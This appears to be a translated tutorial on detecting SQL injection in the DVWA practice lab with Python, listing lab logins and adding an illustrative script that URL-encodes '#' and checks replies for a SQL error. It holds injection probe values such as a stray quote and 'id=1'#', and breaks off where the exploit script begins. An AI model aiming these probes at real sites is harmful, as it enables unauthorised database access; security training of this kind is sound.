0x00 Writing approach
Test for SQL injection and obtain the account names and passwords through it, becoming familiar with the principles and methods of SQL injection along the way. Modules used: the requests module and the re regular-expression module.
Limitation: this approach only works for injection through GET requests.
Lab environment
DVWA, accounts (username/password): gordonb/abc123; admin/password; 1337/charley
Log in to the vulnerable environment and set the DVWA security level to low.
Detect whether SQL injection exists
Append a single quote ('). If an error is reported, an injection point may exist.
Go to the SQL Injection page.
Entering ' produces an error, so error-based injection is present.
Any characters that appear after the first # in a URL are interpreted by the browser as a fragment identifier (a location within the page). None of these characters are sent to the server, so encode # before submitting.
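The following is an added example, not code from the original post. It shows which query parameters reach the server when # is left raw versus percent-encoded, and checks a response body for the SQL error described above. The lab address in BASE, the parameter names id and Submit, and the two response bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Assumed lab address: DVWA on localhost (not given on the page).
BASE = "http://127.0.0.1/dvwa/vulnerabilities/sqli/"

# MySQL syntax-error text, as shown when a stray quote breaks the query.
SQL_ERROR = re.compile(r"You have an error in your SQL syntax", re.I)


def server_view(url):
    """Return the query parameters that reach the server for this URL.

    Everything after the first '#' is the fragment, which HTTP clients
    keep local and never put on the request line.
    """
    return parse_qs(urlsplit(url).query, keep_blank_values=True)


def build_url(base, params):
    """Percent-encode each value so '#' travels as %23 inside the query."""
    return base + "?" + urlencode(params)


def error_appeared(baseline_body, probe_body):
    """True when the probe response has a SQL error the baseline lacks."""
    return bool(SQL_ERROR.search(probe_body)) and not SQL_ERROR.search(baseline_body)


if __name__ == "__main__":
    raw = BASE + "?id=1'#&Submit=Submit"  # '#' left unencoded
    safe = build_url(BASE, {"id": "1'#", "Submit": "Submit"})
    print(raw, "->", server_view(raw))    # Submit is lost in the fragment
    print(safe, "->", server_view(safe))  # both parameters arrive intact

    # Constructed response bodies standing in for the lab's replies.
    baseline = "<pre>ID: 1<br />First name: admin<br />Surname: admin</pre>"
    probe = "You have an error in your SQL syntax; check the manual ... near ''1''' at line 1"
    print("error-based signal:", error_appeared(baseline, probe))
```

Comparing against a baseline response avoids flagging a page that already contains the error text for an unrelated reason.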
Write an exploit script (exp) that detects whether error-based injection is present:
def pdzr